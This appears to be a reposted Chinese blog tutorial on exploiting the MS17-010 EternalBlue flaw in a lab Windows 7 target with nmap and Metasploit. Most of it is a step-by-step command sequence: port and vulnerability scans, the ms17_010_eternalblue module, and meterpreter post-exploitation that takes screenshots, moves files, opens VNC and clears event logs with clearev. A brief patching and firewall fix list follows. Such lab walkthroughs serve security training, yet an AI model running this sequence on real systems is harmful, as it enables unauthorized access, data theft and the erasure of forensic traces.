0


MS17-010 永恒之蓝漏洞利用方式

Eternal blue永恒之蓝漏洞

windows操作系统漏洞

借助工具Metasploit复现漏洞

利用条件:

1.目标计算机开启445端口

2.一般适用计算机系统 windows7 或windows server2008 R2

攻击机器:kali-Linux 192.168.109.130

目标靶机:windows7 192.168.109.129

1.在黑客机器中对目标计算机进行端口的扫描 发现目标445端口处于开放状态

nmap -p 80,3389,3306,445,8080 192.168.109.129

也可以考虑使用namp自带的script功能直接去扫描漏洞

nmap --script=vuln 192.168.109.129

发现同样可以利用ms17010永恒之蓝漏洞

接下来在kali端进行操作:

msfconsole
search ms17-010

接下来首先使用的是永恒之蓝扫描模块

use auxiliary/scanner/smb/smb_ms17_010
show options
set RHOSTS 192.168.109.129

exploit

接下来使用永恒之蓝攻击模块

use exploit/windows/smb/ms17_010_eternalblue
show options

set RHOSTS 192.168.109.129
exploit

msf有一些后渗透模块可以使用

捕获屏幕

meterpreter > screenshot

上传/下载文件

meterpreter > upload hello.txt c://
meterpreter > download d://1.txt

远程桌面

meterpreter > run vnc

使用rdesktop命令远程桌面

root@kali:~# rdesktop 192.168.2.6

清除日志

meterpreter > clearev

修复方案:

1.关闭445端口

2.打开防火墙 安装安全软件

3.安装相应的补丁

标签: 安全 linux 运维

本文转载自: https://blog.csdn.net/weixin_51339377/article/details/123552277
版权归原作者 Simon_Smith 所有, 如有侵权,请联系我们删除。

“MS17-010 永恒之蓝漏洞利用方式”的评论:

还没有评论